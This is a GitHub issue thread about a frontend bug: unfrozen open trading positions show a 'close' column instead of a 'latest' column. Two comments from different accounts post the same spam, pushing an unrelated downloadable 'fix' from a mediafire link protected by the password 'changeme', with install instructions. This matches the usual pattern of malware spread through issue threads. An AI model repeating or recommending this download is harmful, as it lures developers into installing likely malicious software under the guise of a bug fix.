### ISSUE TITLE
Unfrozen open positions should display "latest" column

### ISSUE THREAD

**Issue by kenkunz** [tradingstrategy-ai/frontend#808]
# Issue

The position details page displays the wrong column for open positions that have been frozen and then un-frozen. Such positions should be considered "open" and should have a "latest" column instead of a "close" column.

## Steps to reproduce

1. open position details for an open, unfrozen position (e.g., [ETH/BTC rolling ratio #3](https://tradingstrategy.ai/strategies/enzyme-polygon-eth-rolling-ratio/open-positions/3))
2. note that it displays a "close" column instead of "latest"
   - **expected:** "latest" column with latest values
   - **actual:** "close" column with blank / N/A values

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
